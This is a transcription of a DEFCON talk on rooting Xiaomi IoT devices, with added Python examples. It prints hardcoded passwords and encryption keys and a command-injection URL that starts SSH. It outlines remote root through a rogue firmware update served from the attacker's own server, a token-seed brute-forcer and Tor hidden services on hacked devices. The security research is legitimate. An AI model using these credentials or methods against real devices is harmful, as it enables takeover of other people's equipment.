Having Fun With IoT: Reverse Engineering And Hacking Of Xiaomi IoT Devices

Transcription

Having fun with IoT: Reverse Engineering and Hacking of Xiaomi IoT Devices
DEFCON 26 – Dennis Giese

Outline
- Motivation
- Xiaomi Cloud
- Overview of devices
- Reverse engineering of devices
- Modification of devices

About me
- Researcher at Northeastern University, USA
  - Working with Prof. Guevara Noubir @CCIS
- Grad student at TU Darmstadt, Germany
  - Working with Prof. Matthias Hollick @SEEMOO
- Interests: reverse engineering of interesting devices
  - IoT, smart locks
  - Physical locks ;)
- [Insert more uninteresting information here]

MOTIVATION

Why reverse IoT?
- (Find and exploit bugs to hack other people)
- Detach devices from the vendor
- Enhance functionality
  - Add new features
  - Localization (e.g. sound files)
  - Defeat geo-blocking
- Supporting other researchers

Mon(IoT)r Lab @NEU: https://moniotrlab.ccis.neu.edu/

"Responsible disclosure"?
- Ethical question: "responsible disclosure"?
  - Conflict: rootability vs. device security
- "Service for the community" vs. bug bounty program
  - Before DEFCON: contacted the Xiaomi security team

How we started (research in cooperation with Daniel Wegemer)
- May 2017: Mi Band 2, Vacuum Robot Gen 1
- June 2017: Lumi Smart Home Gateway + sensors
- July 2017: Yeelink Lightbulbs (Color, White), Yeelink LED Strip

How we continued
- Yeelink Desk Lamp
- Philips Eyecare Desk Lamp
- Xiaomi Wi-Fi router
- Yeelink/Philips Ceiling Lights
- Philips Smart LED Bulb
- Vacuum Robot Gen 2
- Yeelink Bedside Lamp
- Xiaomi (Ninebot) M365
- Lumi Aqara Camera
- Yeelink Smart LED Bulb (v2)
- Smart power strip

Why vacuum robots? [Image; source: Xiaomi advertisement]

THE XIAOMI CLOUD

Xiaomi Cloud
- They claim to have the biggest IoT ecosystem worldwide
  - 85 million devices, 800 different models [1]
- Different vendors, one ecosystem
  - Same communication protocol
  - Different technologies supported
  - Implementation differs from manufacturer to manufacturer
- Software quality very different
[1] https://www.espressif.com/en/media ... -plans-iot-development (URL truncated on the slide)
See also: https://github.com/MiEcosystem/miio_open and https://iot.mi.com/index.html

[Diagram: Xiaomi Cloud connections] * There could be more connections (e.g. P2P, FDS)

Device to Cloud communication
- DeviceID
  - Unique per device
- Keys
  - Cloud key (16 byte alpha-numeric)
    - Used for cloud communication (AES encryption)
    - Static; not changed by update or provisioning
  - Token (16 byte alpha-numeric)
    - Used for app communication (AES encryption)
    - Dynamic; generated at provisioning (connecting to a new Wi-Fi)

Cloud protocol
- Data: JSON-formatted messages
- Example of "device registration":
  {'id': 136163637, 'params': {'ap': {'ssid': 'myWifi', 'bssid': 'F8:1A:67:CC:BB:AA', 'rssi': -30}, 'hw_ver': 'Linux', 'life': 82614, 'model': 'rockrobo.vacuum.v1', 'netif': {'localIp': '192.168.1.205', 'gw': '192.168.1.1', 'mask': '255.255.255.0'}, 'fw_ver': '3.3.9_003077', 'mac': '34:CE:00:AA:BB:DD', 'token': 'xxx'}, 'partner_id': '', 'method': '_otc.info'}

Protocol for firmware updates
- APP updates:
  {"method":"miIO.ota","params":{"app_url":"http://cdn.cnbj0.fds.api.mi-img.com/miio_fw/upd_lumi.gateway.v3.bin?...","file_md5":"063df95bd5...cf11e","install":"1","proc":"dnld install","mode":"normal"},"id":123}
- MCU/WiFi updates (no integrity provided: there is no file_md5 at all):
  {"method":"miIO.ota","params":{"mcu_url":"http://cdn.cnbj0.fds.api.mi-img.com/miio_fw/mcu_lumi.gateway.v3.bin?...","install":"1","proc":"dnld install","mode":"normal"},"id":123}
- Subdevice updates:
  {"crc32":"9460d9f0","image_type":"0101","manu_code":"115F","md5":"e9d62...", ... "...iot-ota/LM15_SP_mi_V1.3.22..._OTA_v22_withCRC.ota"}

[Diagram: Xiaomi ecosystem: app, HTTPS, Xiaomi Cloud, WiFi, ZigBee gateway]

App to Cloud communication
- Authentication via OAuth
- Layered encryption
  - Outside: HTTPS
  - Inside: AES using a session key
- Message format: JSON RPC
- Device-specific functions: provided by plugins

App to Cloud communication
- REQ: api.io.mi.com/home/device_list, method: POST, params: []
- Response excerpt (truncated on the slide): ..."1234","token":"abc...zzz","name":"Mi..." ... "Power plug on ...","rssi":-47}

[Map screenshot of device locations; source: OpenStreetMap]

Example of communication relations (vacuum robot)
- Robot internals: compass, LDS (UART), MCU (UART); device.conf holds DID and key
- Miio client: (local):54322 (tcp) for IPC with plain JSON; 0.0.0.0:54321 (udp) for the app with JSON encrypted with the token
- Xiaomi Cloud: ott.io.mi.com:80 (tcp), ot.io.mi.com:8053 (udp); commands and reports as JSON encrypted with the cloud key (tcp/udp)
- *.fds.api.xiaomi.com: sound packages, firmware, maps, logs
- Android/iPhone app: talks to the robot locally (enc(token) JSON, udp) and to the cloud

How to gain independence from the Xiaomi Cloud [Image; copyright: 20th Century Fox]

Proxy cloud communication
- /etc/hosts on the robot redirects the cloud endpoints to the proxy:
  130.83.x.x ot.io.mi.com
  130.83.x.x ott.io.mi.com
- Robot -> Proxy / controller app on ott.io.mi.com:80 (tcp) and ot.io.mi.com:8053 (udp): commands and reports, enc(key) JSON
- *.fds.api.xiaomi.com and the rest of the robot internals (compass, LDS UART, MCU UART, Miio client on (local):54322 tcp and 0.0.0.0:54321 udp) are unchanged; the Android/iPhone app still speaks enc(token) JSON (udp) to the robot

What is Dustcloud?
- Proxy or endpoint server for devices
  - Acts as Xiaomi Cloud emulation
  - Reads traffic in plaintext
  - May send commands to the device
    - Change or suppress commands (e.g. updates)
- Requirements: Device ID, cloud key, DNS redirection
https://github.com/dgiese/dustcloud-documentation

LET'S TAKE A LOOK AT THE PRODUCTS

Products
- 260 different models supported (WiFi, Zigbee, BLE)
- Depending on the selected server location (Mainland China, Taiwan, US, others): models are not always compatible
- My inventory: 42 different models, 99 devices
[Pie chart of models by vendor, values estimated, Mi Home 5.3.13, Mainland China server: others 38%, iSmart 9%, Chungmi 6%, Yeelink 6%, Philips (Yeelink) 4%; remaining slices not legible]

Products: different architectures
- ARM Cortex-A (focus of this talk)
- ARM Cortex-M
  - Marvell 88MW30X (integrated WiFi)
  - Mediatek MT7687N (integrated WiFi + BLE) (focus of my binary patching talk @IoT Village today)
- MIPS
- Xtensa
  - ESP8266, ESP32 (integrated WiFi) ("Why I hate ESP8266" @IoT Village today)

Operating systems
- "Full Linux", e.g. Ubuntu 14.04: vacuum cleaning robots
- OpenWRT: Xiaomi Wifi Speaker, routers, Minij washing machine
- Embedded Linux: IP cameras
- RTOS: lightbulbs, ceiling lights, light strips

Implementations
                   Vacuum Robot        Smart Home Gateway*              Philips Ceiling Light / Yeelink Bedside Lamp
Manufacturer       Rockrobo            Lumi United                      Yeelight
MCU                Allwinner           STM + TI + Marvell (Wi-Fi)       MediaTek (Wi-Fi + BLE)
Firmware update    Encrypted, HTTPS    Not encrypted (no SSL stack!)    Not encrypted, HTTPS (no cert check!)
Debug interfaces   Protected           Available                        Available
Bonus: Chinese device, but unknown communication to a server in Salt Lake City, USA (166.70.53.160)
* Does not apply to DGNWG03LM (gateway model for Taiwan)

Good news
- Vendors/developers are lazy
- Assumed development of firmware:
  - Take SDK/toolchain
  - Modify the sample until the product runs
  - If it works: publish firmware
- All firmwares very similar (memory layout, functions, strings, etc.)

LET'S GET ACCESS TO THE DEVICES

Warranty seal? [Image]

AQARA SMART IP CAMERA (applies to: lumi.camera.aq1)

Overview hardware
- CPU: Hi3518EV200 (ARM Cortex-A)
- RAM: 64 MB
- Flash: 16 MByte
- Wi-Fi: Mediatek MT7601UN via USB
- OS: Embedded Linux
- Zigbee MCU: NXP JN5169

Devices connected via Zigbee (NXP JN5169 based)
- Motion sensor
- Temperature sensors
- Power plug
- Smoke detectors
- Smart door lock

Serial port after bricking the device [Image]

Leaked information
- JFFS2 filesystem not properly cleaned
- 3 different credentials from development devices (hex dumps, partially redacted on the slide):
  58326c20613d3b69237565643d6e45756c6d41
  70aXX306f6d025f00636e20230a6bXX3772612e6900
- Recovered /etc/miio/device.conf (redacted):
  # did must be a unsigned int
  # key ... string
  did=5060365X
  key=NA7NimKoXXXXX...
  mac=28:6C:07:2E:XX:XX
  vendor=lumi
  # model max len 23
  model=lumi.camera.aq1
  p2p_id=...

Rooting
- Serial was not necessary
  - Open telnet server (port 23)
  - Hardcoded root password in /etc/shadow: "root:IIfCcCAiKWPNs:17333:0:99999:7::"
  - DES crypt: the password is truncated to 8 characters
  - Password: "lumi-201"
  - Same credentials for all cameras
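That shadow line is all an auditor needs: a 13-character field with no "$" prefix is traditional DES crypt, which uses a 12-bit salt and silently truncates the password to 8 characters, so an offline crack of a firmware image is cheap and the same hash works on every camera. The script below is an added example for this page, not code from the talk or from the camera firmware: it classifies shadow entries by hash scheme and reports the weak ones, using the slide's root line plus constructed entries.

```python
"""Audit /etc/shadow lines and flag legacy DES-crypt hashes like the camera's.

Added example (not code from the talk or from the camera firmware). The root line
is the one quoted on the slide; the other lines are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Modular-crypt-format prefixes and the hash scheme they denote.
MCF_PREFIXES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}
# Traditional DES crypt: 2 salt chars + 11 hash chars from ./0-9A-Za-z, no '$'.
DES_RE = re.compile(r"^[./0-9A-Za-z]{13}$")

# Constructed shadow file; the root entry is the one shown on the slide.
SAMPLE_SHADOW = [
    "root:IIfCcCAiKWPNs:17333:0:99999:7:::",                        # slide; password "lumi-201"
    "daemon:*:17333:0:99999:7:::",                                   # constructed: locked account
    "admin:$6$saltsalt$notarealhashjustforshape:17333:0:99999:7:::", # constructed
    "guest::17333:0:99999:7:::",                                     # constructed: empty password
]


@dataclass
class Finding:
    user: str
    scheme: str
    severity: str
    note: str


def classify_hash(field: str) -> str:
    """Name the scheme of a shadow password field."""
    if field == "":
        return "empty"
    if field.startswith(("!", "*")):
        return "locked"
    for prefix, scheme in MCF_PREFIXES.items():
        if field.startswith(prefix):
            return scheme
    if DES_RE.match(field):
        return "des-crypt"
    return "unknown"


def des_truncation_collides(a: str, b: str) -> bool:
    """DES crypt consumes only the first 8 characters, so two passwords that share
    an 8-character prefix verify identically against the same hash."""
    return a[:8] == b[:8]


def audit_shadow(lines):
    """Return findings for weak or absent password hashes, one per offending user."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, scheme = fields[0], classify_hash(fields[1])
        if scheme == "des-crypt":
            findings.append(Finding(user, scheme, "high",
                "traditional DES crypt: 12-bit salt, 8-char truncation, cheap to brute-force offline"))
        elif scheme == "empty":
            findings.append(Finding(user, scheme, "high", "empty password field: login without a password"))
        elif scheme == "md5crypt":
            findings.append(Finding(user, scheme, "medium", "md5crypt is fast to brute-force; prefer sha512crypt or yescrypt"))
        elif scheme == "unknown":
            findings.append(Finding(user, scheme, "info", "unrecognised hash format"))
    return findings


if __name__ == "__main__":
    for f in audit_shadow(SAMPLE_SHADOW):
        print(f"{f.severity:6} {f.user:8} {f.scheme:12} {f.note}")
```

Run it against a shadow file pulled from a firmware image (or the JFFS2 leftovers on the flash) to get the list of accounts worth cracking first; the "high" findings are the ones that give up a root shell across a whole product line.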

Modifications
- Replace Chinese sound files
- Replace telnetd by dropbear (SSH)
- Change root password
- Replace camera software

WI-FI NETWORK SPEAKER (applies to: xiaomi.wifispeaker.v1; basic idea also for xiaomi.router.*)

Overview hardware
- CPU: Amlogic Meson3 (ARM Cortex-A)
- RAM: 128 MB
- Flash: 8 GByte
- Wi-Fi + BT: Broadcom BCM4345
- OS: OpenWRT
  - Samba 3.x
- Released: end of 2016

Serial port [Image]

Rooting (research in cooperation with "teprrr")
- Teardown of the device not necessary
- Classic vulnerability: no input validation
  http://{ip}:9999/{ssdp_id}/Upnp/resource/sys?command=nslookup&host=echo 192.168.0.2 ...&dns_server=... /etc/init.d/ssh start
  (command injection through the host and dns_server parameters, as shown on the slide)
- Update (08.08.2018): Xiaomi claims this was fixed in an internal release in April 2018
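The injection works because the handler splices the query parameters straight into a shell command line. The Python below is an added example written for this page; it is not the speaker's code and not the speaker firmware's real handler, which is only reconstructed here. It shows the concatenating form next to a hardened one that allow-lists both parameters and executes nslookup without a shell. The IP address, SSDP id and payload strings in the sample URLs are constructed, modelled on the slide's URL.

```python
"""The speaker's nslookup endpoint: injectable handler next to a hardened one.

Added example, written for this page; not the speaker's code and not the
firmware's real handler (which is reconstructed here in Python). The URL shape
follows the slide; the IP, SSDP id and payload strings are constructed.
"""
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# RFC 1123 hostname: labels of 1-63 alnum/hyphen chars, no leading/trailing hyphen.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

# Constructed requests modelled on the slide's
# http://{ip}:9999/{ssdp_id}/Upnp/resource/sys?command=nslookup&host=...&dns_server=...
BENIGN_URL = ("http://192.168.0.5:9999/uuid-0000/Upnp/resource/sys"
              "?command=nslookup&host=example.com&dns_server=8.8.8.8")
ATTACK_URL = ("http://192.168.0.5:9999/uuid-0000/Upnp/resource/sys"
              "?command=nslookup&host=example.com|/etc/init.d/ssh%20start&dns_server=8.8.8.8")


def vulnerable_command_line(host: str, dns_server: str) -> str:
    """What a handler that concatenates query parameters into a shell string runs.
    Returned instead of executed: the '|' in the attacker's host value ends nslookup
    and starts a second command with the web server's privileges."""
    return f"nslookup {host} {dns_server}"


def validate_host(host: str) -> str:
    """Accept a hostname or an IP literal, nothing else."""
    if HOSTNAME_RE.match(host):
        return host
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        raise ValueError(f"invalid host: {host!r}") from None


def validate_dns_server(server: str) -> str:
    """The resolver must be an IP literal; hostnames are not accepted here."""
    try:
        return str(ipaddress.ip_address(server))
    except ValueError:
        raise ValueError(f"invalid dns_server: {server!r}") from None


def build_nslookup_argv(host: str, dns_server: str) -> list:
    """Hardened form: allow-list both inputs and pass them as separate argv
    entries, so no shell ever parses them."""
    return ["nslookup", validate_host(host), validate_dns_server(dns_server)]


def handle_request(url: str) -> list:
    """Parse the query string and return the argv the hardened handler would run."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if query.get("command") != ["nslookup"]:
        raise ValueError("unsupported command")
    host = query.get("host", [""])[0]
    dns_server = query.get("dns_server", [""])[0]
    return build_nslookup_argv(host, dns_server)


def run_nslookup(host: str, dns_server: str, timeout: float = 5.0) -> str:
    """Execute the hardened argv without a shell (shell=False is the default)."""
    argv = build_nslookup_argv(host, dns_server)
    result = subprocess.run(argv, capture_output=True, text=True, timeout=timeout, check=False)
    return result.stdout


if __name__ == "__main__":
    print(vulnerable_command_line("example.com|/etc/init.d/ssh start", "8.8.8.8"))
    print(handle_request(BENIGN_URL))
    try:
        handle_request(ATTACK_URL)
    except ValueError as exc:
        print("rejected:", exc)
```

The allow-list is the important half: dropping the shell stops metacharacter injection, but an unvalidated host still reaches nslookup's own option parsing, so both checks belong together.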

Firmware updates
- Query update information over HTTP: http://soundbar.pandora.xiaomi.com/XXXXXXX/XXXXXX
- Firmware updates over HTTP
  - Packed LZMA in XML format
  - EXT2 images
  - No signatures

VACUUM CLEANING ROBOTS: rockrobo.vacuum.v1 (end of 2016), roborock.vacuum.s5 (end of 2017); research in cooperation with Daniel Wegemer

Gen 1 device overview [Image; source: Xiaomi advertisement]

Teardown [Image]

Frontside layout mainboard [Image]: 512 MB RAM, STM32 MCU, R16 SoC, 4 GB eMMC flash, WiFi module

Backside layout mainboard [Image]: LIDAR UART, R16 UART (115200 baud), STM UART (921600 baud), Tx/Rx pads

Frontside layout mainboard (Gen 2) [Image]: R16 SoC, WiFi module, 512 MB RAM, STM32 MCU, 4 GB eMMC flash

Rooting: the usual (possibly destructive) way to retrieve the firmware [Image]

Rooting: our weapon of choice [Image]

[Figure: pin layout of the CPU: UART0/UART1/UART2 (RX/TX), MMC data lines D0-D7, CLK, CMD, Reset, TWI1 SDA/SCL, USB DM0/DP0 and DM1/DP1, LCD lines, line-in/phone/mic, VCC/VDD, GND; recovery confirm pad]

Rooting (Gen 1 + Gen 2)
- Short the MMC data lines: the SoC falls back to FEL mode
- Load and execute a tool in RAM via the USB connector
  - Dump MMC flash
  - Modify image
  - Rewrite image to flash

Software
- Ubuntu 14.04.3 LTS (Kernel 3.4.xxx)
  - Mostly untouched, patched on a regular basis
- Player 3.10-svn
  - Open-source cross-platform robot device interface & server
- Proprietary software (/opt/rockrobo)
  - Custom adbd version
- iptables firewall enabled (IPv4!)
  - Blocks port 22 (sshd), port 6665 (player)
  - Fail: IPv6 not blocked at all

Available data on device
- Data
  - Logfiles (syslogs, stats, Wi-Fi credentials)
  - Maps
- Data is uploaded to the cloud
- ~100 GByte of writes per year
- Factory reset does not delete data: maps and logs still exist

Available data on device: maps
- Created by player
- 1024 px * 1024 px
- 1 px = 5 cm

eMMC layout
Label        Content                                           Size in MByte
boot-res     bitmaps & some wav files                          8
env          uboot cmd line                                    16
app          device.conf (DID, key, MAC), adb.conf, vinda      16
recovery     fallback copy of OS                               512
system_a     copy of OS (active by default)                    512
system_b     copy of OS (passive by default)                   512
Download     temporary unpacked OS update                      528
reserve      config + calibration files, blackbox.db           16
UDISK/Data   logs, maps, pcap files                            1900

Update process
1. Cloud sends miIO.ota {"mode":"normal", "install":"1", "app_url":"https://[URL]/v11_[version].pkg", "file_md5":"..."}
2. Download [app_url]
3. MD5 ok?
4. Decrypt image
5. dd the image onto the passive copy (system_a active, system_b passive)
6. Update root password in /etc/shadow
7. Reboot

Firmware updates
- Integrity: MD5 provided by the cloud
- Full images
  - Encrypted tar.gz archives
  - Contain disk.img with a 512 MByte ext4 filesystem
- Encryption
  - ccrypt [256-bit Rijndael encryption (AES)]
  - Static password: "rockrobo"
- Sound packages: static password "r0ckrobo#23456"
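The update process above and the miIO.ota messages in the cloud-protocol section share one property: the only integrity value is an MD5 carried inside the same unauthenticated message, and the MCU variant has none at all. The Python below is an added example for this page, not the speaker's or Xiaomi's code. It replays both message shapes (underscores in app_url, mcu_url and file_md5 restored), checks the MD5 the way the device can, and shows that whoever can send the message also chooses the MD5, which is why the remote root on the following slides works. The CDN is a dict of constructed bytes standing in for HTTP, the non-cdn URL is assumed, and ccrypt decryption of the image is left out.

```python
"""Walk the miIO.ota flow from the slides and show what the MD5 check does and does not buy.

Added example, not the speaker's or Xiaomi's code. The two message shapes are the
ones on the slides; the CDN is a dict of constructed bytes standing in for HTTP,
the 192.168.1.50 URL is an assumed attacker/owner web server, and the ccrypt
decryption step of the real flow is left out.
"""
import hashlib
import json

# Constructed stand-in for the CDN and for an attacker's/owner's own web server.
CDN = {
    "http://cdn.cnbj0.fds.api.mi-img.com/miio_fw/upd_lumi.gateway.v3.bin": b"GATEWAY-APP-IMAGE-v3\x00" * 64,
    "http://cdn.cnbj0.fds.api.mi-img.com/miio_fw/mcu_lumi.gateway.v3.bin": b"GATEWAY-MCU-IMAGE-v3\x00" * 64,
    "http://192.168.1.50/v11_rooted.pkg": b"ROOTED-VACUUM-IMAGE\x00" * 64,  # assumed own server
}
APP_URL = "http://cdn.cnbj0.fds.api.mi-img.com/miio_fw/upd_lumi.gateway.v3.bin"
MCU_URL = "http://cdn.cnbj0.fds.api.mi-img.com/miio_fw/mcu_lumi.gateway.v3.bin"
ROGUE_URL = "http://192.168.1.50/v11_rooted.pkg"


def cdn_fetch(url: str) -> bytes:
    """Stand-in for the HTTP download step."""
    return CDN[url]


def ota_message(url_key: str, url: str, md5: str = None, ota_id: int = 123) -> dict:
    """Build a miIO.ota message in the shape shown on the slides."""
    params = {url_key: url, "install": "1", "proc": "dnld install", "mode": "normal"}
    if md5 is not None:
        params["file_md5"] = md5
    return {"method": "miIO.ota", "params": params, "id": ota_id}


APP_UPDATE = ota_message("app_url", APP_URL, md5=hashlib.md5(CDN[APP_URL]).hexdigest())
MCU_UPDATE = ota_message("mcu_url", MCU_URL)          # no file_md5, as on the slide
APP_UPDATE_JSON = json.dumps(APP_UPDATE)              # wire form


def check_ota(message, fetch=cdn_fetch):
    """Do what a device without signed firmware can do: download and compare the MD5.
    Returns (verdict, reason)."""
    msg = json.loads(message) if isinstance(message, str) else message
    if msg.get("method") != "miIO.ota":
        return "reject", "not a miIO.ota message"
    params = msg.get("params", {})
    url = params.get("app_url") or params.get("mcu_url")
    if not url:
        return "reject", "no app_url/mcu_url"
    image = fetch(url)
    expected = params.get("file_md5")
    if expected is None:
        return "accept-unverified", "no file_md5: image flashed without any integrity check"
    if hashlib.md5(image).hexdigest() != expected.lower():
        return "reject", "file_md5 mismatch"
    return "accept", "file_md5 matches: detects corruption in transit, not who produced the image"


def craft_ota(url: str, image: bytes, ota_id: int = 1) -> dict:
    """Whoever can send miIO.ota (the holder of the token) also chooses file_md5, so
    their own image always passes check_ota; this is the remote-root path on the slides."""
    return ota_message("app_url", url, md5=hashlib.md5(image).hexdigest(), ota_id=ota_id)


if __name__ == "__main__":
    for name, msg in (("app", APP_UPDATE), ("mcu", MCU_UPDATE),
                      ("rogue", craft_ota(ROGUE_URL, CDN[ROGUE_URL]))):
        print(name, *check_ota(msg))
```

A signature over the image with a key the device trusts, checked before dd, is the missing piece; an MD5 chosen by the sender protects against a flaky download and nothing else.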


Let's root remotely
- Preparation: rebuild firmware
  - Include authorized_keys
  - Remove the iptables rule for sshd
- Send a "miIO.ota" command to the vacuum
  - Encrypted with the token (from the app or from the unprovisioned state)
  - Pointing to your own http server

[Diagram: "Get Token" (unprovisioned state) -> "miIO.ota" -> own webserver]

SSH [Screenshot]


Possible countermeasures
- Changing the firmware key: useless, we will figure it out ;)
- Encrypting/obfuscating the log files and maps
  - Recently introduced
  - Here is the AES-128-CBC key: "RoCKR0B0@BEIJING"
[Image; copyright: 20th Century Fox]

How to get the log and map AES key?
- rrlogd uses AES encryption functions from the OpenSSL library
  - Imported as a dynamic library
  - Interesting function: EVP_EncryptInit_ex(...)
- Helpful tool: ltrace
  - Intercepts library calls
  - Shows the contents/arguments of function calls

Persistence
- Patch the recovery partition
  - Replace the custom adbd with the open-source one
  - Disable the firewall
- Disable updates
  - Kill the SysUpdate process
  - Disable ccrypt
- Extract credentials
  - Content of "vinda.conf": root password (XOR 0x37)
  - DID, cloud key

Side note about entropy (research in cooperation with Jan Ruge)
- Recap: the token is the AES256 key
- Method used for generation:
  - Initialization: srand(seed); the seed has 2^31 states
  - 16 times rand()
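The point of the entropy side note is that the token looks like 95 bits of alphanumerics but can only ever take 2^31 values, so it can be recovered by regenerating tokens from every seed. The Python below is an added example for this page, not the speaker's or Jan Ruge's code: it implements the described generation (srand(seed), then 16 calls to rand()) on a stand-in LCG that is assumed for illustration and is not the device's libc, and recovers the seed by brute force over a truncated seed range.

```python
"""Why a 2^31-seed PRNG token is brute-forceable, shown on a stand-in generator.

Added example, not the speaker's or Jan Ruge's code. The slide states the method
(srand(seed) with a 31-bit seed, then 16 rand() calls); the generator below is a
stand-in LCG assumed for illustration, not the libc rand() of the device, and the
alphabet is the 62 alphanumerics the token is described as using.
"""
import math
import string

ALPHABET = string.ascii_letters + string.digits   # 62 symbols
TOKEN_LEN = 16
SEED_BITS = 31


class StandInRand:
    """Minimal LCG with the constants of the classic ANSI C example rand();
    stands in for the device's libc, whose exact generator the slide does not give."""

    def __init__(self, seed: int):
        self.state = seed & 0x7FFFFFFF

    def rand(self) -> int:
        self.state = (self.state * 1103515245 + 12345) & 0x7FFFFFFF
        return self.state >> 16   # 15-bit output, like the ANSI example


def generate_token(seed: int) -> str:
    """Token the way the slide describes it: srand(seed), then 16 x rand()."""
    rng = StandInRand(seed)
    return "".join(ALPHABET[rng.rand() % len(ALPHABET)] for _ in range(TOKEN_LEN))


def entropy_bits():
    """Nominal token entropy versus what the seed actually provides."""
    nominal = TOKEN_LEN * math.log2(len(ALPHABET))   # about 95.3 bits
    return SEED_BITS, nominal


def recover_seed(token: str, max_seed: int):
    """Brute-force the seed by regenerating tokens; the full 2^31 range is a few
    minutes of CPU in C, and the first-symbol filter cuts out 61/62 of the work."""
    first = token[0]
    for seed in range(max_seed):
        rng = StandInRand(seed)
        if ALPHABET[rng.rand() % len(ALPHABET)] != first:
            continue
        if generate_token(seed) == token:
            return seed
    return None


if __name__ == "__main__":
    token = generate_token(54321)
    print(token, "seed found:", recover_seed(token, 1 << 16))
    print("seed bits vs nominal token bits:", entropy_bits())
```

Swap the stand-in for the target's real rand() (ltrace on a provisioning run tells you which libc and whether srand is fed time() or something weaker) and the same loop turns a sniffed token into its seed.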

Summary of the vacuum
- Rooting: remote! (No "foil attack" required anymore)
- Cloud connection
  - Run without cloud: support by third-party tools (e.g. FloleVac, FHEM, etc.)
  - Run with your own cloud
https://xiaomi.flole.de/

HAVING FUN IN HACKING

Connection to the dark side
- Idea by Prof. Noubir: let's run Tor hidden services on IoT
  - Paper from 2015: OnionBots, a stealthy botnet with compromised IoT devices (https://arxiv.org/pdf/1501.03378.pdf)
- Easy to install in Ubuntu
  - Make SSH accessible via Tor
  - No need for NAT ;)

Using empty space [Image]

Using empty space
- The Zigbee module fits in the vacuum
  - Use the serial connection
  - ARM binaries of the gateway run natively
  - Result: Zombie-Gateway-Vacuum
- USB stick
  - More space: mobile data storage
  - Soldered to the MicroUSB port

Mobile Wi-Fi mapper
- Idea:
  - Parsing of position2d from the player logfile {x_pos, y_pos, yaw_pos, x_vel, y_vel, yaw_vel}
  - Retrieving WiFi information from the Linux kernel {link, level, noise, SSID, BSSID}
- Developed with Andrew Tu @HackBeanpot 2018, Boston
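The Python below is an added example for this page, not the mapper written with Andrew Tu at HackBeanpot. It parses constructed player position2d lines (the slide gives only the field names x_pos, y_pos, yaw_pos, x_vel, y_vel, yaw_vel, so the line layout is an assumption), interpolates the robot's position at each Wi-Fi sample's timestamp, and bins the signal level into 5 cm cells per BSSID, the map resolution the slides give. The Wi-Fi samples are constructed in the field order the slide lists.

```python
"""Fuse robot positions with Wi-Fi readings into a coverage map, as the slide describes.

Added example, not the code written with Andrew Tu at HackBeanpot. The player
position2d line format is constructed (the slide only lists the fields x_pos,
y_pos, yaw_pos, x_vel, y_vel, yaw_vel); the Wi-Fi samples are constructed in the
field order the slide gives (link, level, noise, SSID, BSSID).
"""
from bisect import bisect_left
from collections import defaultdict

# Constructed player log: "<t> position2d <x_pos> <y_pos> <yaw_pos> <x_vel> <y_vel> <yaw_vel>"
PLAYER_LOG = """\
1000.0 position2d 0.00 0.00 0.00 0.20 0.00 0.00
1001.0 position2d 0.20 0.00 0.00 0.20 0.00 0.00
1002.0 position2d 0.40 0.00 1.57 0.00 0.20 0.00
1003.0 position2d 0.40 0.20 1.57 0.00 0.20 0.00
1004.0 position2d 0.40 0.40 1.57 0.00 0.00 0.00
"""

# Constructed Wi-Fi samples: (t, link, level_dBm, noise_dBm, ssid, bssid)
WIFI_SAMPLES = [
    (1000.4, 70, -40, -95, "lab-wifi", "F8:1A:67:00:00:01"),
    (1001.6, 62, -48, -95, "lab-wifi", "F8:1A:67:00:00:01"),
    (1002.5, 31, -72, -95, "guest",    "F8:1A:67:00:00:02"),
    (1003.9, 55, -55, -95, "lab-wifi", "F8:1A:67:00:00:01"),
]

CELL_M = 0.05   # 1 px = 5 cm, the map resolution the slides give


def parse_player_log(text: str):
    """Return time-sorted (t, x_pos, y_pos, yaw_pos) tuples from position2d lines."""
    fixes = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 8 and parts[1] == "position2d":
            t, x, y, yaw = map(float, (parts[0], parts[2], parts[3], parts[4]))
            fixes.append((t, x, y, yaw))
    fixes.sort()
    return fixes


def position_at(fixes, t: float):
    """Linearly interpolate (x, y) between the two fixes surrounding time t;
    clamp to the first/last fix outside the logged interval."""
    times = [f[0] for f in fixes]
    i = bisect_left(times, t)
    if i == 0:
        return fixes[0][1], fixes[0][2]
    if i == len(fixes):
        return fixes[-1][1], fixes[-1][2]
    t0, x0, y0, _ = fixes[i - 1]
    t1, x1, y1, _ = fixes[i]
    f = (t - t0) / (t1 - t0)
    return x0 + f * (x1 - x0), y0 + f * (y1 - y0)


def build_heatmap(fixes, samples):
    """Map bssid -> {(cell_x, cell_y): strongest level seen in that cell, dBm}."""
    grid = defaultdict(dict)
    for t, link, level, noise, ssid, bssid in samples:
        x, y = position_at(fixes, t)
        cell = (int(round(x / CELL_M)), int(round(y / CELL_M)))
        cells = grid[bssid]
        cells[cell] = max(level, cells.get(cell, level))
    return grid


if __name__ == "__main__":
    grid = build_heatmap(parse_player_log(PLAYER_LOG), WIFI_SAMPLES)
    for bssid, cells in grid.items():
        print(bssid, sorted(cells.items()))
```

Feeding the cells into the 1024 x 1024 map the robot already keeps gives a signal-strength overlay of the flat; on a real device the Wi-Fi side comes from /proc/net/wireless or an iw scan rather than the constructed list.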

Mobile Wi-Fi mapper [Map: Genuine Jack Morton Office, NE side, 5th floor]

If in need of additional space [Image]
- Done by a Dustcloud user
- Reason: broken MMC chip
- Not recommended for everyone ;)

IoT chatting with IoT [Image]

One word of warning
- Never leave your devices unprovisioned
  - Someone else can provision them for you
  - Install malicious firmware
- Be careful with used devices
  - e.g. Amazon Marketplace, eBay, etc.
  - Some malicious software may be installed
- Never install rooted firmware from untrusted sources!!!!
  - Especially not from Russian forums!

Conclusion
- Basic best practices not used
  - Firmware signatures
  - HTTPS, certificate verification
  - Hardware security features
- Good: we can modify the devices
- Bad: someone else can do too

Acknowledgements
- Daniel Wegemer (aka DanielAW)
- Prof. Guevara Noubir (CCIS, Northeastern University)
